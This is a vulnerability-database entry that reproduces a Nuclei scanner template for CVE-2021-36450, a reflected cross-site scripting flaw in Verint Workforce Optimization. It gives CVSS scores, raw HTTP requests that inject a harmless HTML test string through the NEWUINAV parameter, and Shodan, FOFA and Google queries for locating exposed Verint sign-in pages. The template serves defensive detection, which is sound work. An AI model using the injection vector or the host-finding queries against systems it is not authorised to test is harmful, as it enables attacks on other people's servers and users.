Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-36450
HistoryJul 14, 2022 - 2:37 a.m.

Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting

2022-07-1402:37:09
ProjectDiscovery
github.com
2

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

61.4%

Verint Workforce Optimization 15.2.8.10048 contains a cross-site scripting vulnerability via the control/my_notifications NEWUINAV parameter.

id: CVE-2021-36450

info:
  name: Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting
  author: atomiczsec
  severity: medium
  description: Verint Workforce Optimization 15.2.8.10048 contains a cross-site scripting vulnerability via the control/my_notifications NEWUINAV parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patch or upgrade to a non-vulnerable version of Verint Workforce Optimization.
  reference:
    - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740
    - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html
    - http://verint.com
    - https://nvd.nist.gov/vuln/detail/CVE-2021-36450
    - https://medium.com/%401nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-36450
    cwe-id: CWE-79
    epss-score: 0.00229
    epss-percentile: 0.61052
    cpe: cpe:2.3:a:verint:workforce_optimization:15.2.8.10048:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: verint
    product: workforce_optimization
    shodan-query:
      - title:"Verint Sign-in"
      - http.title:"verint sign-in"
    fofa-query: title="verint sign-in"
    google-query: intitle:"verint sign-in"
  tags: cve2021,cve,xss,verint

http:
  - raw:
      - |
        GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}}

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><h1>Test</h1>26" class="loginUserNameText'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrfp_login
        group: 1
        regex:
          - 'csrfp_login=([a-zA-Z0-9]+);'
        internal: true
        part: header
# digest: 4b0a004830460221009e0d23882ea6dcde31d9492018606ce4ed4e4ae17f2bec81b0d1c1a7c6e03b47022100c62d9af7176d23599fd1b4cedc95379cd05fbd8b0fa75bf3a324d149a3954054:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

61.4%

Related for NUCLEI:CVE-2021-36450